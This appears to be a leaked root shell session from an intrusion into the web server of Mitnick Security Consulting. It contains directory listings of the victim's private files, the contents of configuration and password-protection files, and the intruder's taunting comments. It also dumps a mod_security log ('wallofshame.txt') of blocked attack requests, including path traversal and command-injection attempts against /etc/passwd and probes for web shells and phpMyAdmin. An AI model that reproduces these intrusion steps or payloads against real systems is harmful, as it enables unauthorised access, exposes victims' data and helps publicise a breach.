drwxr-xr-x 22 mitsec mitsec   4096 Jul 16 10:36 .
drwxr-xr-x 12 root   root   4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec     64 Mar 20  2007 .Xauthority
-rwxr-xr-x  1 mitsec mitsec   2399 Jul  9 10:01 .bash_history
-rwxr-xr-x  1 mitsec mitsec     24 Feb 25  2006 .bash_logout
-rwxr-xr-x  1 mitsec mitsec    191 Feb 25  2006 .bash_profile
-rwxr-xr-x  1 mitsec mitsec    124 Feb 25  2006 .bashrc
-rwxr-xr-x  1 mitsec mitsec   5619 Aug 21  2006 .canna
-rwxr-xr-x  1 mitsec mitsec     17 Jan 30  2006 .contactemail
-rwxr-xr-x  1 mitsec mitsec     10 Jan 30  2006 .contactsavetime
drwxr-xr-x  5 mitsec mitsec   4096 Mar 21 12:58 .cpanel
-rwxr-xr-x  1 mitsec mitsec   1682 Jan 23  2005 .cpanel-ducache
-rwxr-xr-x  1 mitsec mitsec     19 Jul 17 10:46 .dns
-rwxr-xr-x  1 mitsec mitsec    383 Aug 21  2006 .emacs
drwxr-xr-x  5 mitsec mitsec   4096 Sep  1  2008 .fantasticodata
-rwxr-xr-x  1 mitsec mitsec     16 Jul  2 23:11 .ftpquota
drwxr-xr-x  2 mitsec mitsec   4096 Sep  1  2008 .gnupg
drwxr-xr-x 52 mitsec nobody   4096 Sep  1  2008 .htpasswds
-rwxr-xr-x  1 mitsec mitsec      7 Sep  2  2008 .lang
-rw-------  1 mitsec mitsec     14 Jul 16 10:22 .lastlogin
-rwxr-xr-x  1 mitsec mitsec     35 Jan 13  2009 .lesshst
-rwxr-xr-x  1 mitsec mitsec    6441532 May  6  2006
.pureftpd-upload.445d6ea6.15.1358.7997c79e
drwxr-xr-x  2 mitsec mitsec   4096 Sep  1  2008 .sqmaildata
drwxr-xr-x  2 mitsec mitsec   4096 Sep  1  2008 .ssh
drwxr-xr-x  2 mitsec mitsec   4096 Mar 28  2007 .trash
-rwxr-xr-x  1 mitsec mitsec    705 Feb 28  2008 .viminfo
-rwxr-xr-x  1 mitsec mitsec      5 Mar  5  2006 .whmtheme
-rwxr-xr-x  1 mitsec mitsec    658 Aug 21  2006 .zshrc
-rwxr-xr-x  1 mitsec mitsec    1361309 Mar  7  2008 CDMA WORKSHOP.rar
-rwxr-xr-x  1 mitsec mitsec   73025457 Mar 20  2007 MitnickDemo.wmv
-rwxr-xr-x  1 mitsec mitsec   20152320 Mar  7  2008 SOFTWARE PACK.rar
-rwxr-xr-x  1 mitsec mitsec  49569 Mar  7  2008 UNIBOX.rar
lrwxrwxrwx  1 mitsec mitsec     32 Jul  7 19:34 access-logs ->
/usr/local/apache/domlogs/mitsec
-rwxr-xr-x  1 mitsec mitsec  582461440 Aug  7  2007 archive.tar
-rwxr-xr-x  1 mitsec mitsec 607360 Sep  4  2007 arcot.ppt
-rwxr-xr-x  1 mitsec mitsec   30242339 Jul 25  2007
asterisk-1.0.8-backup-2007-07-25.tar.gz
-rwxr-xr-x  1 mitsec mitsec 2189910925 Oct 25  2007
backup-10.25.2007_23-54-41_mitsec.tar.gz
-rw-------  1 mitsec mitsec 3264566004 Jul 16 10:35
backup-7.16.2009_10-22-58_mitsec.tar.gz
-rw-------  1 mitsec mitsec 3264029970 Jul  8 16:51
backup-7.8.2009_16-39-47_mitsec.tar.gz
-rwxr-xr-x  1 mitsec mitsec  617186883 Aug 19  2007 backup-8.19.2007.tar.gz
-rwxr-xr-x  1 mitsec mitsec  90279 Nov  6  2006 badboys.mp3
-rwxr-xr-x  1 mitsec mitsec    211 May  5  2007 boot.ini
-rwxr-xr-x  1 mitsec mitsec    5305344 Feb  7  2007 circosec-FINAL.ppt
-rwxr-xr-x  1 mitsec mitsec    5299200 Jan  8  2007 circosec.ppt
-rwxr-xr-x  1 mitsec mitsec  99001 Nov 21  2007 clid.tar.gz
-rwxr-xr-x  1 mitsec mitsec  50838 Jun 20 03:10 contact_form.php
drwxr-xr-x  4 mitsec mitsec   4096 Sep  1  2008 cpanel3-skel
-rwxr-xr-x  1 mitsec mitsec      1 Jan 20 22:01 cpbackup-exclude.conf
drwxr-xr-x  2 mitsec mitsec   4096 Mar 18 00:19 cpmove.psql
drwxr-xr-x  3 mitsec mitsec   4096 Sep  1  2008 cpmove.psql.1220367507
drwxr-xr-x  3 mitsec mitsec   4096 Sep  2  2008 cpmove.psql.1237665475
-rwxr-xr-x  1 mitsec mitsec 238515 Aug 19  2007 error_log
-rwxr-xr-x  1 mitsec mitsec   72854668 Aug  3  2008 error_log.txt
drwxr-x--- 14 mitsec mail   4096 Oct 23  2008 etc
-rwxr-xr-x  1 mitsec mitsec  33449 Nov 24  2007 etcasterisk.tar.gz
-rwxr-xr-x  1 mitsec mitsec   74625550 Oct 20  2007 files.zip
-rwxr-xr-x  1 mitsec mitsec   17912486 Apr 18  2007 for-faa.zip
-rwxr-xr-x  1 mitsec mitsec  35938 Apr  6  2007 httpd.conf
-rwxr-xr-x  1 mitsec mitsec  35186 Apr  6  2007 httpd.conf.rpmnew
-rwxr-xr-x  1 mitsec mitsec    1515582 Nov 12  2006 issa.jpg
-rwxr-xr-x  1 mitsec mitsec      0 Aug 29  2006 landesk.ppt
-rwxr-xr-x  1 mitsec mitsec      0 Aug 29  2006 landesk1.ppt
-rwxr-xr-x  1 mitsec mitsec      0 Aug 29  2006 landesk2.ppt
drwxr-xr-x  2 mitsec mitsec   4096 Aug 13  2007 logs
drwxrwx--- 10 mitsec mitsec   4096 Mar 21 14:35 mail
-rwxr-xr-x  1 mitsec mitsec   38559604 Apr 25  2005 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec   18084536 Apr 18  2007 mitnickpromo2.wmv
-rwxr-xr-x  1 mitsec mitsec 600292 Aug  7  2007
mitsec_mitsecmscontact.csv.zip
-rwxr-xr-x  1 mitsec mitsec 616494 Aug  7  2007
mitsec_mitsecmscontact.sql.zip
-rwxr-xr-x  1 mitsec mitsec 693914 Aug  7  2007
mitsec_mitsecmscontact.xls.zip
-rwxr-xr-x  1 mitsec mitsec   1506 Apr  4  2007 mod_security.conf
drwxr-xr-x  5 mitsec mitsec   4096 Sep  1  2008 moved
-rwxr-xr-x  1 mitsec mitsec   9457 Nov 18  2006 presentations.php
drwxr-xr-x  3 mitsec mitsec   4096 Mar 21 14:34 public_ftp
drwxr-xr-x 24 mitsec nobody   4096 Jul  9 10:01 public_html
-rwxr-xr-x  1 mitsec mitsec  11274 Apr  4  2007 ssl.conf
drwxr-xr-x  2 mitsec mitsec   4096 Jan 30  2008 stuff
drwxr-xr-x  7 mitsec mitsec   4096 Oct 10  2008 tmp
-rwxr-xr-x  1 mitsec mitsec   30189757 Nov 24  2007 varlib.tar.gz
-rwxr-xr-x  1 mitsec mitsec  66023 Jun 19 21:23 websitephp.tar.gz
lrwxrwxrwx  1 mitsec mitsec     11 Jul  7 19:18 www -> public_html
drwxr-xr-x  2 mitsec mitsec   4096 Nov 12  2006 zzhp
-rwxr-xr-x  1 mitsec mitsec  61314 Jun 19 22:03 zzhp.tar.gz
root@dc21 [~]# cd www/; ls -la
total 82928
drwxr-xr-x 24 mitsec nobody 4096 Jul  9 10:01 .
drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec  629 Feb 26 14:36 .htaccess
-rwxr-xr-x  1 mitsec mitsec   729350 Aug  7  2007 CSC-Testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec  1194067 May 12  2008
FBI_Pretexts_and_Cover_Techniques_May-1956.pdf
-rwxr-xr-x  1 mitsec mitsec  2547699 Aug  7  2007 Mitnick_Playboy_feature.pdf
-rwxr-xr-x  1 mitsec mitsec   687114 Nov 15  2008 PsychologyToday1208.pdf
-rwxr-xr-x  1 mitsec mitsec   117138 Mar  1  2008 US-pretrial.pdf
-rwxr-xr-x  1 mitsec mitsec 1038 Oct 20  2007 _contact_settings.php
-rwxr-xr-x  1 mitsec mitsec  528 Jan 18 16:26 _footer.php
-rwxr-xr-x  1 mitsec mitsec 3133 Aug  7  2007 _header.php
-rwxr-xr-x  1 mitsec mitsec 1380 Mar 28  2005 _news_frontpage.php
-rwxr-xr-x  1 mitsec mitsec    18277 Jun 28 15:20 _sidebar.php
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 alexkasper
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 amc
-rwxr-xr-x  1 mitsec mitsec 37314215 Oct 20  2007 amc.zip
-rwxr-xr-x  1 mitsec mitsec 2798 Aug  7  2007 aoi_reviews.php
drwxr-xr-x  2 mitsec mitsec 4096 Oct 24  2008 blittle
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 cgi-bin
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 cialdini
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 circosec
drwxr-xr-x  2 mitsec mitsec 4096 May 15 01:46 clid
-rwxr-xr-x  1 mitsec mitsec 2870 Aug  7  2007 company.php
-rwxr-xr-x  1 mitsec mitsec 2462 Jan 13  2006 config.php
drwxr-xr-x  4 mitsec mitsec 4096 Sep  1  2008 contact-admin
-rwxr-xr-x  1 mitsec mitsec 2216 Aug  7  2007 contact-old.php
-rwxr-xr-x  1 mitsec mitsec 2174 Mar 19  2007 contact-saved.php
-rwxr-xr-x  1 mitsec mitsec 1662 Aug 26  2007 contact.php
-rwxr-xr-x  1 mitsec mitsec    22744 Nov 16  2006 contact.php.bk
-rwxr-xr-x  1 mitsec mitsec    22519 Nov 13  2006 contact.php.save
-rwxr-xr-x  1 mitsec mitsec 1054 Aug  7  2007 contact_confirmation.php
-rwxr-xr-x  1 mitsec mitsec    50576 Jun 20 03:17 contact_form.matt
-rwxr-xr-x  1 mitsec mitsec    50245 Jun  9 15:45 contact_form.oldform
-rwxr-xr-x  1 mitsec mitsec    50806 Jul  9 09:53 contact_form.php
-rwxr-xr-x  1 mitsec mitsec 1988 Dec  7  2006 contact_new.php.bk
-rwxr-xr-x  1 mitsec mitsec 8021 Nov 16  2006 contact_submit.php.bk
drwxr-xr-x  3 mitsec mitsec 4096 Feb 26 14:36 defthi
drwxr-xr-x  5 mitsec mitsec 4096 Sep  1  2008 dev
drwxr-xr-x  3 mitsec mitsec 4096 Sep  1  2008 elsag
-rwxr-xr-x  1 mitsec mitsec 1613 Jan 13  2006 error.gif
-rwxr-xr-x  1 mitsec mitsec   384144 Aug  7  2007 faa.pdf
-rwxr-xr-x  1 mitsec mitsec 3897 Mar 28  2005 feeds.php
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 flash
-rwxr-xr-x  1 mitsec mitsec 4859 Aug 22  2006 generateimage.php
-rwxr-xr-x  1 mitsec mitsec   23 Nov 20  2006 googlehostedservice.html
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 guillermo
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 images
-rwxr-xr-x  1 mitsec mitsec    12083 Mar  5  2007 index-save.php
-rwxr-xr-x  1 mitsec mitsec 5394 May 18 17:28 index.php
-rwxr-xr-x  1 mitsec mitsec    12077 Nov 26  2006 index.php.save
-rwxr-xr-x  1 mitsec mitsec  385 Mar 21 17:59 info.txt
-rwxr-xr-x  1 mitsec mitsec 1440 Aug  7  2007 investigations.php
-rwxr-xr-x  1 mitsec mitsec  1515582 Aug  7  2007 issa.jpg
drwxr-xr-x  3 mitsec mitsec 4096 Jun 20 03:16 jon
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 keppler
-rwxr-xr-x  1 mitsec mitsec 8793 Aug  7  2007 lastRSS.php
drwxr-xr-x  2 mitsec mitsec 4096 Jan 20 16:51 media
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 mitnick
-rwxr-xr-x  1 mitsec mitsec 38559604 Aug 20  2006 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec 5089 Jan 13  2006 msc.css
drwxr-xr-x  3 mitsec mitsec 4096 Sep  1  2008 news
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 patrickau
-rwxr-xr-x  1 mitsec mitsec  1088600 Oct 27  2008 pdi-testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec 7120 Aug  7  2007 presentations.php
-rwxr-xr-x  1 mitsec mitsec 9188 Jun 28 15:21 press.php
-rwxr-xr-x  1 mitsec mitsec 3487 Mar 28  2005 privacy.php
-rwxr-xr-x  1 mitsec mitsec 3111 Aug  7  2007 products.php
-rwxr-xr-x  1 mitsec mitsec 1200 Aug 13  2007 resources.php
-rwxr-xr-x  1 mitsec mitsec 8172 Aug  7  2007 services.php
-rwxr-xr-x  1 mitsec mitsec 5218 Aug 13  2007 speaking.php
-rwxr-xr-x  1 mitsec mitsec 4975 Sep 29  2006 speakingold.php
-rwxr-xr-x  1 mitsec mitsec    28169 Aug  7  2007 ssa.pdf
-rwxr-xr-x  1 mitsec mitsec 2430 Aug  7  2007 style.css
-rwxr-xr-x  1 mitsec mitsec 5731 May 18 17:28 testimonials.php
drwxr-xr-x  2 mitsec mitsec 4096 Sep  1  2008 ttf
-rwxr-xr-x  1 mitsec mitsec 2726 Oct 20  2007 verify_config.php
-rwxr-xr-x  1 mitsec mitsec 3928 Mar 24 17:08 video.php
-rwxr-xr-x  1 mitsec mitsec 5857 Aug 22  2006 wallofshame.txt
-rwxr-xr-x  1 mitsec mitsec 3034 Aug 26  2007 workshop_signup.php
-rwxr-xr-x  1 mitsec mitsec    20981 Nov 16  2006 workshop_signup.php.bk
-rwxr-xr-x  1 mitsec mitsec  888 Aug  7  2007
workshop_signup_confirmation.php
-rwxr-xr-x  1 mitsec mitsec 3305 Dec  7  2006 workshop_signup_new.php.bk
-rwxr-xr-x  1 mitsec mitsec 5373 Nov 16  2006 workshop_signup_submit.php.bk
-rwxr-xr-x  1 mitsec mitsec 1208 Aug  7  2007 workshops.php
drwxr-xr-x  8 mitsec mitsec 4096 Sep  1  2008 zzhp
root@dc21 [~]# cat wallofshame.txt
Requesting IP Date Time Handler GET Host Mod_Security-Message
Mod_Security-Action
167.216.252.40 2006-08-22 11:20:05
/images/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern
match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:20:03 cgi-script  9b.4d.344a.static.theplanet.com
Access denied with code 403. Pattern match "xmlrpc" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:20:02  /phpxmlrpc/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"xmlrpc" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:20:01  /xmlrpc/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"xmlrpc" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:59 cgi-script
/images/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:57 cgi-script /webmail/rwwwshell.pl HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"shell\\.pl" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:56 cgi-script
/webmail/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:56 cgi-script
/webmail/cgiforum.cgi?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:55 cgi-script
/webmail/cgiforum.pl?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:54 cgi-script
/webmail/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:52  /images/perl HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"perl " at THE_REQUEST 403
167.216.252.40 2006-08-22 11:19:49 cgi-script /webmail/.htaccess HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"
\\.htaccess" at THE_REQUEST 403
167.216.252.40 2006-08-22 11:19:39  /phpMyAdmin-2.6.4/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:38  /phpMyAdmin-2.6.4-pl1/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:38  /phpMyAdmin264/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:36 cgi-script /images/rwwwshell.pl HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"shell\\.pl" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:35 cgi-script
/images/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:35 cgi-script
/images/cgiforum.cgi?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:34 cgi-script
/images/cgiforum.pl?thesection=../../../../../../../etc/passwd%00 HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:33 cgi-script
/images/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:22
/nqt.php?portNum=80&queryType=all&target=someserver.com%3Bcat+/etc/passwd&Submi
t=Do+It HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403.
Pattern match "/etc/passwd" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:20
/network_query.php?portNum=80&queryType=all&target=someserver.com%3Bcat+/etc/pa
sswd&Submit=Do+It HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with
code 403. Pattern match "img src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:18  /nph-cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img
src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:18  /cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img
src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:17  /cgiwrap/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img
src=javascript" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:16  /nph-cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "
403
167.216.252.40 2006-08-22 11:19:16  /cgiwrapd/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "
403
167.216.252.40 2006-08-22 11:19:15  /cgiwrap/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "
403
167.216.252.40 2006-08-22 11:19:04  /phpMyAdmin/css/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403
167.216.252.40 2006-08-22 11:19:04  /phpmyadmin/css/ HTTP/1.1
9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match
"phpmyadmin" at REQUEST_URI 403


root@dc21 [~]# #lolroot@dc21 [~]# cat config.php
<script language="php"> ## rofl, come join us in 2009 Kev.
// LICENSE NOTE,  This software is dual licensed using BSD-Style and LGPL.
Where there is any discrepancy, the BSD-Style license will take precedence.
// Review the relative file ./license.txt for details. The intention is that
these works are available for all
// and may be profited from but not restricted in use.
// For most recent see
http://www.cocoavillagepublishing.com/development/tools/php/scripts/
// NOTE - TO AVOID "Cannot send session cache limiter - headers already sent"
// try to avoid blank lines and tabs to minimize chance header starts premature
by web output
//
// Defining some settings with variables
//
// $BAS_mode="";  blank means nominal, if "test" then we evoke more scripts
//$BAS_mode="test" ;
$BAS_mode="";
//
// Important, number of characters in image, suggest 4
$BASnumimgchars = 4 ; 
//
// set $BASaddimgnoise = "yes" for arcs and noise to be added to image to
further confuse ocr
$BASaddimgnoise = "no";
//$BASaddimgnoise = "yes" ;
//
// IF entered code matches random generated string, after action will redirect
page
// to this location using php header function. Scripting code so header will
use
// relative location per notes at
http://us2.php.net/manual/en/function.header.php
$MatchSendToRelativeURL="good_submission.html" ;
//
// Action for good match, for now the function sends an email, which should be
// a secret or a priority like email to pager of fax....
$BAS_secretemail="
blockautosubmit@webengr.com" ;
//
// Fromemail for notificationsof successful submissions,
$BAS_fromemail = "
www@".$_SERVER['HTTP_HOST'] ;
//
//
//
//
//******************************************//
//  BELOW YOU PROBABLY WILL NOT BE CHANGING //
//******************************************//
//
// declare some functions to be used in places
// function to return random characters for image
function GetRandomChar() {
 // Seed with microseconds since last "whole" second
 mt_srand((double)microtime()*1000000);
 // Use random number 1-3, if 1, we generate a number 0-9 (ascii 48 to
57),
 // if it was 2, we generate an uppercase character (ascii 65 to 70),
 // if it was 3, we generate a lowercase character (ascii 97 to 122),
 switch (mt_rand(1,3)) {
 case 1:
  $BAErandchar = mt_rand(48, 57);
  break;
 case 2:
  $BAErandchar = mt_rand(65, 90);
  break;
 case 3:
      $BAErandchar = mt_rand(97, 122);
  break;
  } 
 return chr($BAErandchar);
 }
//
//
//
</script>
root@dc21 [~]# ls -la media/ ## we know u luv it k3v1n
total 1292888
drwxr-xr-x  2 mitsec mitsec 4096 Jan 20 16:51 .
drwxr-xr-x 24 mitsec nobody 4096 Jul  9 10:01 ..
-rwxr-xr-x  1 mitsec mitsec  1780588 Jan 20  2006 2005 FBI Computer Crime
Survey Report.pdf
-rwxr-xr-x  1 mitsec mitsec    50950 Aug  7  2007 41stParamete2.pdf
-rwxr-xr-x  1 mitsec mitsec 22324052 Jan 17  2005 60mins.wmv
-rwxr-xr-x  1 mitsec mitsec 83791947 Feb  6  2008 AMW.mp4
-rwxr-xr-x  1 mitsec mitsec 67229236 Feb  8  2008 AMW.wmv
-rwxr-xr-x  1 mitsec mitsec   115766 Jul 15  2006
AppSense-White-Paper-Mitnick.pdf
-rwxr-xr-x  1 mitsec mitsec    46238 Aug  7  2007 Applied_Scan2.pdf
-rwxr-xr-x  1 mitsec mitsec 99973354 Feb  6  2008 Bloomberg1.mp4
-rwxr-xr-x  1 mitsec mitsec 80357704 Feb  8  2008 Bloomberg1.wmv
-rwxr-xr-x  1 mitsec mitsec 97313195 Feb  6  2008 Bloomberg2.mp4
-rwxr-xr-x  1 mitsec mitsec 78221632 Feb  8  2008 Bloomberg2.wmv
-rwxr-xr-x  1 mitsec mitsec 97840298 Feb  6  2008 Bloomberg3.mp4
-rwxr-xr-x  1 mitsec mitsec 78549644 Feb  8  2008 Bloomberg3.wmv
-rwxr-xr-x  1 mitsec mitsec   729350 Jul 24  2007 CSC-Testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec    60537 Jan 22  2005 HFSC-Testimony-20030403.pdf
-rwxr-xr-x  1 mitsec mitsec 72885850 Jan 31  2008 InterviewWithMariFrank.mp3
-rwxr-xr-x  1 mitsec mitsec   211536 Jul 29  2007 Kevin_Mitnick_Bio_BW.pdf
-rwxr-xr-x  1 mitsec mitsec 73025457 Nov 11  2005 MitnickDemo.wmv
-rwxr-xr-x  1 mitsec mitsec  5659648 Jan 17  2005 Mitnick_Color.zip
-rwxr-xr-x  1 mitsec mitsec  2547699 Jul 24  2007 Mitnick_Playboy_feature.pdf
-rwxr-xr-x  1 mitsec mitsec  5144656 Jan 17  2005 Mitnick_bw.zip
-rwxr-xr-x  1 mitsec mitsec 86455159 Feb  6  2008 Quest Interview.mp4
-rwxr-xr-x  1 mitsec mitsec 69397314 Feb  8  2008 Quest Interview.wmv
-rwxr-xr-x  1 mitsec mitsec    72399 Jan 22  2005 SGAC-Testimony-20000302.pdf
-rwxr-xr-x  1 mitsec mitsec 51160350 Feb  6  2008 Star Jones Interview.mp4
-rwxr-xr-x  1 mitsec mitsec 41092294 Feb 13  2008 Star Jones Interview.wmv
-rwxr-xr-x  1 mitsec mitsec 41092294 Feb  8  2008 Star Jones.wmv
-rwxr-xr-x  1 mitsec mitsec    18229 Dec 14  2005 THE ART OF
INTRUSION_Press_Kit.zip
-rwxr-xr-x  1 mitsec mitsec   718004 Mar 28  2005 The_Age.pdf
-rwxr-xr-x  1 mitsec mitsec 33177621 Oct 20  2005 Trinidad.wmv
-rwxr-xr-x  1 mitsec mitsec   117138 Mar  1  2008 US-pretrial.pdf
-rwxr-xr-x  1 mitsec mitsec    50087 Jan 17  2005 aod_pk_v1-0.zip
-rwxr-xr-x  1 mitsec mitsec 27561886 Jan 17  2005 artofdeceptionshort.wmv
-rwxr-xr-x  1 mitsec mitsec   388671 Jan 20 16:51 cic-testimonial.pdf
-rwxr-xr-x  1 mitsec mitsec   384144 Jul 24  2007 faa.pdf
-rwxr-xr-x  1 mitsec mitsec   52 Jan 17  2005 index.php
-rwxr-xr-x  1 mitsec mitsec    18794 Aug 10  2007 infragard.pdf
-rwxr-xr-x  1 mitsec mitsec  1515582 Jul 24  2007 issa.jpg
-rwxr-xr-x  1 mitsec mitsec 38559604 Apr 25  2005 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec 18084536 Mar 19  2007 mitnickpromo2.wmv
-rwxr-xr-x  1 mitsec mitsec    32359 Jan 17  2005 msc_brochure.pdf
-rwxr-xr-x  1 mitsec mitsec    46449 Jan 17  2005 msc_course_outline.pdf
-rwxr-xr-x  1 mitsec mitsec  3948582 Aug 19  2007 pick-cards.mov
-rwxr-xr-x  1 mitsec mitsec 40543570 Aug 19  2007 pick-cards.wmv
-rwxr-xr-x  1 mitsec mitsec    28169 Jul 24  2007 ssa.pdf
root@dc21 [~]# ls -la dev
total 208
drwxr-xr-x  5 mitsec mitsec  4096 Sep  1  2008 .
drwxr-xr-x 24 mitsec nobody  4096 Jul  9 10:01 ..
-rwxr-xr-x  1 mitsec mitsec   123 Oct 20  2007 .htaccess
-rwxr-xr-x  1 mitsec mitsec  1038 Oct 20  2007 _contact_settings.php
-rwxr-xr-x  1 mitsec mitsec   528 Aug  1  2007 _footer.php
-rwxr-xr-x  1 mitsec mitsec  3121 Aug  1  2007 _header.php
-rwxr-xr-x  1 mitsec mitsec 11023 Aug  7  2007 _sidebar.php
-rwxr-xr-x  1 mitsec mitsec  2798 Jul 24  2007 aoi_reviews.php
drwxr-xr-x  2 mitsec mitsec  4096 Sep  1  2008 cache
-rwxr-xr-x  1 mitsec mitsec  2870 Jul 23  2007 company.php
-rwxr-xr-x  1 mitsec mitsec  1778 Jul 29  2007 contact.php
-rwxr-xr-x  1 mitsec mitsec  1054 Jul 24  2007 contact_confirmation.php
-rwxr-xr-x  1 mitsec mitsec 50245 Jul 24  2007 contact_form.php
-rwxr-xr-x  1 mitsec mitsec  2839 Jul 24  2007 error_log
drwxr-xr-x  2 mitsec mitsec  4096 Sep  1  2008 images
-rwxr-xr-x  1 mitsec mitsec  3627 Aug  7  2007 index.php
-rwxr-xr-x  1 mitsec mitsec  1440 Jul 23  2007 investigations.php
-rwxr-xr-x  1 mitsec mitsec  8793 Jul 24  2007 lastRSS.php
-rwxr-xr-x  1 mitsec mitsec  7120 Jul 23  2007 presentations.php
-rwxr-xr-x  1 mitsec mitsec  4991 Jul 29  2007 press.php
-rwxr-xr-x  1 mitsec mitsec  3111 Jul 23  2007 products.php
-rwxr-xr-x  1 mitsec mitsec  1738 Jul 23  2007 resources.php
-rwxr-xr-x  1 mitsec mitsec  8172 Jul 29  2007 services.php
-rwxr-xr-x  1 mitsec mitsec  5225 Aug  1  2007 speaking.php
-rwxr-xr-x  1 mitsec mitsec  2430 Jul 24  2007 style.css
-rwxr-xr-x  1 mitsec mitsec  2043 Aug  7  2007 testimonials.php
-rwxr-xr-x  1 mitsec mitsec  1981 Jul 24  2007 video.php
-rwxr-xr-x  1 mitsec mitsec  3036 Jul 29  2007 workshop_signup.php
-rwxr-xr-x  1 mitsec mitsec   888 Jul 24  2007 workshop_signup_confirmation.php
-rwxr-xr-x  1 mitsec mitsec  1208 Jul 23  2007 workshops.php
drwxr-xr-x  8 mitsec mitsec  4096 Sep  1  2008 zzhp
root@dc21 [~]# cat dev/.htaccess
AuthType Basic
AuthName "Restricted Area"
AuthUserFile "/home/mitsec/.htpasswds/public_html/dev/passwd"
require valid-user
root@dc21 [~]# cat /home/mitsec/.htpasswds/public_html/dev/passwd
root@dc21 [~]# cat dev/index.php
<?php require("_header.php"); ?>
<!-- Copy begins  -->

<strong>Mitnick Security Consulting, LLC</strong> is a full-service information

